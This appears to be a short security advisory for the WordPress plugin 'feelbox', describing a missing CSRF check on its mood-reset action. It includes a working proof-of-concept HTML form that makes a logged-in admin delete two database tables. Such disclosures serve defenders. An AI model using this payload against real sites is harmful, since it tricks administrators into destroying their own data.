The plugin does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables
Make a logged in admin open a page containing the HTML code below
<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
<input type="text" name="feelbox_submit_hidden" value="Y">
<input type="text" name="cleardata" value="DELETE">
<input type="submit" name="submit" value="submit">
</form>